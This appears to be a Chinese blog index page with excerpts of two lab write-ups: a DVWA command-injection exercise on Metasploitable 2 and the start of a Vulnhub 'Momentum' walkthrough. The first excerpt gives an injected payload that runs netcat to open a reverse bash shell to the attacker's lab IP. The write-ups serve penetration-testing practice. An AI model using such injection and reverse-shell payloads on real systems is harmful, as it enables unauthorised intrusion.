摘要: Command Execution 靶机基本情况 Metasploitable 2中的DVWA Level: Low 构造语句: ;nc -e /bin/bash 192.168.176.128 5555 其中192.168.176.128为Kali Linux IP 地址 可以成功拿到shell: 阅读全文
posted @ 2022-12-28 15:27 Jason_huawen 阅读(86) 评论(0) 推荐(0) 编辑
摘要: Momentum 识别目标主机IP地址 ─(kali㉿kali)-[~/Vulnhub/Momentum] └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24 Currently scanning: Finished! | Screen View: Uni 阅读全文
posted @ 2022-12-28 11:14 Jason_huawen 阅读(125) 评论(0) 推荐(0) 编辑